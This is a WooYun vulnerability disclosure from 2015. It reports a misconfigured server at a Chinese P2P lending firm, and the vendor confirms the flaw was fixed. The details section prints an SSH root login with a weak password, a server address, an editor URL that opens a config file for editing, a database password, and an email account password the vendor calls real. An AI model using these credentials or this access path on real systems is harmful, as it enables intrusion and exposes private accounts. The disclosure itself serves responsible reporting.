当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0111083

漏洞标题:p2p金融安全之黄河金融某服务器运维不当(部分用户数据库沦陷、任意用户密码修改)

相关厂商:黄河金融

漏洞作者: 北京方便面

提交时间:2015-05-07 14:56

修复时间:2015-06-21 15:32

公开时间:2015-06-21 15:32

漏洞类型:系统/服务运维配置不当

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-05-07: 细节已通知厂商并且等待厂商处理中
2015-05-07: 厂商已经确认,细节仅向厂商公开
2015-05-17: 细节向核心白帽子及相关领域专家公开
2015-05-27: 细节向普通白帽子公开
2015-06-06: 细节向实习白帽子公开
2015-06-21: 细节向公众公开

简要描述:

p2p金融安全之黄河金融某服务器运维不当(部分用户数据库沦陷、任意用户密码修改)

详细说明:

ssh弱口令
115.238.52.132:110
用户名:root
密码:123456

http://yf.hhedai.com/upgrade.php?m=editor&f=edit&filePath=L3Zhci93d3cvaHRtbC96ZW50YW9wbXMvL2NvbmZpZy9teS5waHA=&action=edit


需要在头内加个X-Requested-With: aaa
<?php
$config->installed = true;
$config->debug = false;
$config->requestType = 'PATH_INFO';
$config->db->host = '127.0.0.1';
$config->db->port = '3306';
$config->db->name = 'zentao';
$config->db->user = 'root';
$config->db->password = 'admin123456';
$config->db->prefix = 'zt_';
$config->webRoot = getWebRoot();
$config->default->lang = 'zh-cn';
$config->mysqldump = '/usr/bin/mysqldump';
通过ssh连接内网数据库

屏幕快照 2015-04-29 下午1.35.43.png


屏幕快照 2015-04-29 下午12.23.20.png


no-reply@hhedai.com
hhedai518


屏幕快照 2015-04-29 下午1.28.35.png


屏幕快照 2015-04-29 下午1.28.43.png


屏幕快照 2015-04-29 下午2.56.29.png

漏洞证明:

修复方案:

版权声明:转载请注明来源 北京方便面@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-05-07 15:30

厂商回复:

此服务器为内部测试服务器,大意导致部署了弱密码,虽然数据为内部测试数据,但邮箱密码真实,可能会造成巨大安全事故。

最新状态:

2015-05-07:漏洞已修复,感谢北京方便面@乌云。


漏洞评价:

评论

  1. 2015-04-29 15:48 | 疯狗 认证白帽子 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)

    方便面叔叔带我飞